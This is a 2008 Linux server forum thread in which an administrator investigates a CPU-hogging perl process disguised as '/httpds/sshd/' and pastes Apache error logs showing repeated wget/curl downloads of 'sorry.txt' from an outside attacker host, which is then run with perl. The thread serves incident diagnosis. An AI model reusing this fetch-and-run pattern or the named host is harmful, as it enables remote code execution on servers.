Linux - ServerThis forum is for the discussion of Linux Software used in a server related context.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Since few weeks my server slooooow down sometimes and when I log me in via SSH I can see that the perl process eating CPU time. The only one solution is too kill those processes one after another (because it resurrect )
I see that this process has been started by Apache so I'm afraid that it could be hack attempt.
Code:
# top
13599 apache 25 0 5088 2868 1200 R 97.1 0.3 27:36.12 perl
Code:
#ps aux | grep 13599
apache 13599 52.0 0.2 5088 2868 ? R 14:27 27:44 /httpds/sshd/
Could someone tell me what "/httpds/sshd/" is?
I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6
perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.
The problem is I cannot unplug this machine because this is leased root server
I saw that webmin starts also some perl processes but they not causing this problem I think.
How can I found who starts this processes and what is "/httpds/sshd/"
I'm trying to be very carefully with this server. No root access, complicated password, I check regularly the logfiles but I didn't saw something suspect
Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.
httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.
I cannot ask my provider because this is a root server. So this mean I have a physical server in theirs server room. But this is my server, it's not virtual. So this mean that they does not installed any programs there and only support is for hardware or networks connection.
It seems to be hack attempt. I saw this in my general apache error logfile:
Code:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13685 100 13685 0 0 2267 0 0:00:06 0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed perl sorry.txt
--14:27:07-- http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'
0K .......... ... 100% 37.4K=0.4s
14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31-- http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'
0K .......... ... 100% 34.6K=0.4s
15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13685 100 13685 0 0 16702 0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
I think that it does not work. But how it is possible if apache perl module is disabled?
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
Advertisement
Oracle Magazine contains technology strategy articles, sample code, tips, Oracle and partner news, how to articles for developers and DBAs, and more. Click Here to receive a complimentary subscription courtesy of LQ.
) 
